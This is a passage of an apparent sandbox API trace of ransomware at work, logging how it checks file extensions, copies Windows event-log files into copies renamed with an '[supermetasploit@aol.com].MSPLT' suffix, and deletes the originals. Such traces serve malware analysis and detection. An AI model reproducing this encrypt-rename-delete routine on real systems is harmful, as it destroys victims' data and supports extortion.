(lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.952] lstrlenW (lpString=".doc") returned 4 [0292.952] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".docx") returned 5 [0292.952] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.952] lstrlenW (lpString=".pdf") returned 4 [0292.952] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".xls") returned 4 [0292.952] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".xlsx") returned 5 [0292.952] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.952] lstrlenW (lpString=".ppt") returned 4 [0292.952] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.952] lstrlenW (lpString=".zip") returned 4 [0292.952] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".rar") returned 4 [0292.952] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".bz2") returned 4 [0292.952] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString=".7z") returned 3 [0292.952] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.952] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.952] lstrlenW (lpString=".dbf") returned 4 [0292.952] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.952] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.953] lstrlenW (lpString=".1cd") returned 4 [0292.953] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.953] lstrlenW (lpString=".jpg") returned 4 [0292.953] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.953] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.953] lstrlenW (lpString=".doc") returned 4 [0292.953] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString=".docx") returned 5 [0292.953] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.953] lstrlenW (lpString=".pdf") returned 4 [0292.953] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString=".xls") returned 4 [0292.953] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString=".xlsx") returned 5 [0292.953] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.953] lstrlenW (lpString=".ppt") returned 4 [0292.953] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.953] lstrlenW (lpString=".zip") returned 4 [0292.953] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString=".rar") returned 4 [0292.953] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.953] lstrlenW (lpString=".bz2") returned 4 [0292.953] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.954] lstrlenW (lpString=".7z") returned 3 [0292.954] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.954] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.954] lstrlenW (lpString=".dbf") returned 4 [0292.954] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.954] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.954] lstrlenW (lpString=".1cd") returned 4 [0292.954] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.954] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0292.954] lstrlenW (lpString=".jpg") returned 4 [0292.954] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.954] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.954] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 47 [0292.954] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.955] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0292.955] CloseHandle (hObject=0x37c) returned 1 [0292.955] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 0x20 [0292.955] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.955] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.955] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.955] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.956] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0292.956] GetLastError () returned 0x0 [0292.956] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.963] WriteFile (in: hFile=0x474, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.967] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.967] WriteFile (in: hFile=0x474, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x132, lpOverlapped=0x0) returned 1 [0292.967] SetEndOfFile (hFile=0x474) returned 1 [0292.967] CloseHandle (hObject=0x474) returned 1 [0292.972] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.972] SetEndOfFile (hFile=0x37c) returned 1 [0292.974] CloseHandle (hObject=0x37c) returned 1 [0292.974] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0292.974] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4actioncenter.evtx")) returned 1 [0292.975] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.975] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.975] lstrlenW (lpString=".doc") returned 4 [0292.975] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.975] lstrlenW (lpString=".docx") returned 5 [0292.975] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.975] lstrlenW (lpString=".pdf") returned 4 [0292.975] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.975] lstrlenW (lpString=".xls") returned 4 [0292.975] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.975] lstrlenW (lpString=".xlsx") returned 5 [0292.975] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.975] lstrlenW (lpString=".ppt") returned 4 [0292.975] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.975] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.975] lstrlenW (lpString=".zip") returned 4 [0292.976] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString=".rar") returned 4 [0292.976] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString=".bz2") returned 4 [0292.976] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString=".7z") returned 3 [0292.976] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.976] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.976] lstrlenW (lpString=".dbf") returned 4 [0292.976] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.976] lstrlenW (lpString=".1cd") returned 4 [0292.976] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.976] lstrlenW (lpString=".jpg") returned 4 [0292.976] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.976] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.976] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.976] lstrlenW (lpString=".doc") returned 4 [0292.976] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".docx") returned 5 [0292.977] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0292.977] lstrlenW (lpString=".pdf") returned 4 [0292.977] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".xls") returned 4 [0292.977] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".xlsx") returned 5 [0292.977] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0292.977] lstrlenW (lpString=".ppt") returned 4 [0292.977] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.977] lstrlenW (lpString=".zip") returned 4 [0292.977] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".rar") returned 4 [0292.977] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".bz2") returned 4 [0292.977] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString=".7z") returned 3 [0292.977] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0292.977] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.977] lstrlenW (lpString=".dbf") returned 4 [0292.977] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.977] lstrlenW (lpString=".1cd") returned 4 [0292.977] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0292.977] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4ActionCenter.evtx") returned 55 [0292.977] lstrlenW (lpString=".jpg") returned 4 [0292.977] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0292.977] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0292.978] lstrlenW (lpString="Microsoft-Windows-Shell-Core%4Operational.evtx") returned 46 [0292.978] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.978] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0292.978] CloseHandle (hObject=0x37c) returned 1 [0292.978] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 0x20 [0292.978] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.978] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0292.979] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.979] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0292.979] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x474 [0292.980] GetLastError () returned 0x0 [0292.980] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0292.984] WriteFile (in: hFile=0x474, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0292.987] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0292.987] WriteFile (in: hFile=0x474, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x130, lpOverlapped=0x0) returned 1 [0292.987] SetEndOfFile (hFile=0x474) returned 1 [0292.987] CloseHandle (hObject=0x474) returned 1 [0293.436] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0293.437] SetEndOfFile (hFile=0x37c) returned 1 [0293.438] CloseHandle (hObject=0x37c) returned 1 [0293.438] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0293.439] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx")) returned 1 [0293.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.871] lstrlenW (lpString=".doc") returned 4 [0293.871] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".docx") returned 5 [0293.871] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.871] lstrlenW (lpString=".pdf") returned 4 [0293.871] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".xls") returned 4 [0293.871] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".xlsx") returned 5 [0293.871] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.871] lstrlenW (lpString=".ppt") returned 4 [0293.871] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.871] lstrlenW (lpString=".zip") returned 4 [0293.871] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".rar") returned 4 [0293.871] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".bz2") returned 4 [0293.871] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.871] lstrlenW (lpString=".7z") returned 3 [0293.871] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.871] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.871] lstrlenW (lpString=".dbf") returned 4 [0293.872] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.872] lstrlenW (lpString=".1cd") returned 4 [0293.872] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.872] lstrlenW (lpString=".jpg") returned 4 [0293.872] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.872] lstrlenW (lpString=".doc") returned 4 [0293.872] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString=".docx") returned 5 [0293.872] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0293.872] lstrlenW (lpString=".pdf") returned 4 [0293.872] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString=".xls") returned 4 [0293.872] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString=".xlsx") returned 5 [0293.872] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0293.872] lstrlenW (lpString=".ppt") returned 4 [0293.872] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.872] lstrlenW (lpString=".zip") returned 4 [0293.872] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString=".rar") returned 4 [0293.872] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0293.872] lstrlenW (lpString=".bz2") returned 4 [0293.873] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0293.873] lstrlenW (lpString=".7z") returned 3 [0293.873] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0293.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.873] lstrlenW (lpString=".dbf") returned 4 [0293.873] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0293.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.873] lstrlenW (lpString=".1cd") returned 4 [0293.873] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0293.873] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned 54 [0293.873] lstrlenW (lpString=".jpg") returned 4 [0293.873] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0293.873] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0293.873] lstrlenW (lpString="Microsoft-Windows-Store%4Operational.evtx") returned 41 [0293.873] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.272] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x371ff14 | out: lpFileSize=0x371ff14*=69632) returned 1 [0294.272] CloseHandle (hObject=0x37c) returned 1 [0294.272] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 0x20 [0294.272] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0294.272] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0294.272] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.272] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.273] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0294.274] GetLastError () returned 0x0 [0294.274] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x11000, lpOverlapped=0x0) returned 1 [0294.281] WriteFile (in: hFile=0x478, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x11010, lpOverlapped=0x0) returned 1 [0294.284] ReadFile (in: hFile=0x37c, lpBuffer=0x41d7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x371fecc, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesRead=0x371fecc*=0x0, lpOverlapped=0x0) returned 1 [0294.284] WriteFile (in: hFile=0x478, lpBuffer=0x41d7020*, nNumberOfBytesToWrite=0x126, lpNumberOfBytesWritten=0x371fc94, lpOverlapped=0x0 | out: lpBuffer=0x41d7020*, lpNumberOfBytesWritten=0x371fc94*=0x126, lpOverlapped=0x0) returned 1 [0294.284] SetEndOfFile (hFile=0x478) returned 1 [0294.284] CloseHandle (hObject=0x478) returned 1 [0294.289] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x371fec0 | out: lpNewFilePointer=0x0) returned 1 [0294.289] SetEndOfFile (hFile=0x37c) returned 1 [0294.291] CloseHandle (hObject=0x37c) returned 1 [0294.291] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0294.291] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx")) returned 1 [0294.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.292] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.292] lstrlenW (lpString=".doc") returned 4 [0294.292] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0294.292] lstrlenW (lpString=".docx") returned 5 [0294.292] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0294.292] lstrlenW (lpString=".pdf") returned 4 [0294.292] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0294.292] lstrlenW (lpString=".xls") returned 4 [0294.293] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString=".xlsx") returned 5 [0294.293] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0294.293] lstrlenW (lpString=".ppt") returned 4 [0294.293] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.293] lstrlenW (lpString=".zip") returned 4 [0294.293] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString=".rar") returned 4 [0294.293] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString=".bz2") returned 4 [0294.293] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString=".7z") returned 3 [0294.293] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.293] lstrlenW (lpString=".dbf") returned 4 [0294.293] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.293] lstrlenW (lpString=".1cd") returned 4 [0294.293] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 [0294.293] lstrlenW (lpString=".jpg") returned 4 [0294.293] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0294.293] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 49 